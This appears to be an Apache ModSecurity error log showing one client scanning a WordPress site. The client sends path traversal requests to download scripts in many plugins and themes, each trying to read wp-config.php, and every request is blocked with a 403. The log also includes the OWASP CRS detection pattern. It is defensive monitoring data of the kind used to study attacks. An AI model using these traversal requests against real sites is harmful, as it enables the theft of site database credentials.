[line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/3d-twitter-wall/proxy.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/3d-twitter-wall/proxy.php"] [unique_id "Y8DxHqGMrWzzUVMdEhcL-gAAAMY"] [Fri Jan 13 00:50:22.761211 2023] [:error] [pid 31476:tid 140315222562560] [client 185.206.224.212:43050] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/w3-total-cache/pub/files.php?file=..%2F..%2F..%2F..%2Fwp-config.php&nonce=0"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/w3-total-cache/pub/files.php"] [unique_id "Y8DxHqGMrWzzUVMdEhcL-wAAAM0"] [Fri Jan 13 00:50:24.437224 2023] [:error] [pid 31476:tid 140315256133376] [client 185.206.224.212:43056] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/count-per-day/download.php?n=1&f=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/count-per-day/download.php"] [unique_id "Y8DxIKGMrWzzUVMdEhcL_QAAAMk"] [Fri Jan 13 00:50:24.551825 2023] [:error] [pid 31043:tid 140315247740672] [client 185.206.224.212:43060] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Rivercitychiro/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Rivercitychiro/framework/utilities/download/getfile.php"] [unique_id "Y8DxIMx9A9c0KkSpLadQIAAAAIo"] [Fri Jan 13 00:50:24.670699 2023] [:error] [pid 31476:tid 140315230955264] [client 185.206.224.212:43062] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/backbone/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/backbone/download.php"] [unique_id "Y8DxIKGMrWzzUVMdEhcL_gAAAMw"] [Fri Jan 13 00:50:24.789765 2023] [:error] [pid 31476:tid 140315180599040] [client 185.206.224.212:43066] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/cakifo/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/cakifo/download.php"] [unique_id "Y8DxIKGMrWzzUVMdEhcL_wAAANI"] [Fri Jan 13 00:50:24.919337 2023] [:error] [pid 31476:tid 140315163813632] [client 185.206.224.212:43068] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/derby-book-festival/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/derby-book-festival/download.php"] [unique_id "Y8DxIKGMrWzzUVMdEhcMAAAAANQ"] [Fri Jan 13 00:50:25.050280 2023] [:error] [pid 31476:tid 140315405498112] [client 185.206.224.212:43070] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/EEEZ/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/EEEZ/download.php"] [unique_id "Y8DxIaGMrWzzUVMdEhcMAQAAAMA"] [Fri Jan 13 00:50:25.170794 2023] [:error] [pid 31476:tid 140315298096896] [client 185.206.224.212:43072] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/greenearth-v1-06/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/greenearth-v1-06/download.php"] [unique_id "Y8DxIaGMrWzzUVMdEhcMAgAAAMQ"] [Fri Jan 13 00:50:25.299880 2023] [:error] [pid 31476:tid 140315147028224] [client 185.206.224.212:43074] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/IqraAcademy/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/IqraAcademy/download/download.php"] [unique_id "Y8DxIaGMrWzzUVMdEhcMAwAAANY"] [Fri Jan 13 00:50:25.661289 2023] [:error] [pid 31042:tid 140315197384448] [client 185.206.224.212:43076] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/lmm5th/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/lmm5th/download.php"] [unique_id "Y8DxIY6vAq65Ygpdg5ObRgAAAFA"] [Fri Jan 13 00:50:25.784006 2023] [:error] [pid 31476:tid 140315172206336] [client 185.206.224.212:43078] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/loom/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/loom/download.php"] [unique_id "Y8DxIaGMrWzzUVMdEhcMBAAAANM"] [Fri Jan 13 00:50:25.899913 2023] [:error] [pid 31476:tid 140315239347968] [client 185.206.224.212:43080] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mercato/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mercato/framework/utilities/download/getfile.php"] [unique_id "Y8DxIaGMrWzzUVMdEhcMBQAAAMs"] [Fri Jan 13 00:50:26.014636 2023] [:error] [pid 31476:tid 140315197384448] [client 185.206.224.212:43082] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php"] [unique_id "Y8DxIqGMrWzzUVMdEhcMBgAAANA"] [Fri Jan 13 00:50:26.139737 2023] [:error] [pid 31476:tid 140315388712704] [client 185.206.224.212:43084] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/ParentingOurParents/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/ParentingOurParents/download/download.php"] [unique_id "Y8DxIqGMrWzzUVMdEhcMBwAAAMI"] [Fri Jan 13 00:50:26.254556 2023] [:error] [pid 31476:tid 140315397105408] [client 185.206.224.212:43086] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/salient/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/salient/download.php"] [unique_id "Y8DxIqGMrWzzUVMdEhcMCAAAAME"] [Fri Jan 13 00:50:26.369272 2023] [:error] [pid 31041:tid 140315405498112] [client 185.206.224.212:43088] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyseventeen/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyseventeen/download.php"] [unique_id "Y8DxIsPRCDYHCWWhHpAjuAAAAAA"] [Fri Jan 13 00:50:26.483992 2023] [:error] [pid 31041:tid 140315247740672] [client 185.206.224.212:43090] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/verse/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/verse/download.php"] [unique_id "Y8DxIsPRCDYHCWWhHpAjuQAAAAo"] [Fri Jan 13 00:50:26.610596 2023] [:error] [pid 31041:tid 140315298096896] [client 185.206.224.212:43092] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/wp-clean-slate/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/wp-clean-slate/download.php"] [unique_id "Y8DxIsPRCDYHCWWhHpAjugAAAAQ"] [Fri Jan 13 00:50:26.729204 2023] [:error] [pid 31041:tid 140315388712704] [client 185.206.224.212:43094] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/philippe-riehling/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/philippe-riehling/functions/download.php"] [unique_id "Y8DxIsPRCDYHCWWhHpAjuwAAAAI"] [Fri Jan 13 00:50:26.844079 2023] [:error] [pid 31476:tid 140315214169856] [client 185.206.224.212:43096] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/directory-starter/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/directory-starter/download.php"] [unique_id "Y8DxIqGMrWzzUVMdEhcMCQAAAM4"] [Fri Jan 13 00:50:26.972911 2023] [:error] [pid 31041:tid 140315256133376] [client 185.206.224.212:43098] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/firestarter/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/firestarter/down.php"] [unique_id "Y8DxIsPRCDYHCWWhHpAjvAAAAAk"] [Fri Jan 13 00:50:27.094917 2023] [:error] [pid 31043:tid 140315306489600] [client 185.206.224.212:43102] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/presstissimo/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/presstissimo/download.php"] [unique_id "Y8DxI8x9A9c0KkSpLadQIQAAAIM"] [Fri Jan 13 00:50:27.220217 2023] [:error] [pid 31476:tid 140315230955264] [client 185.206.224.212:43104] [client 185.206.224.212] 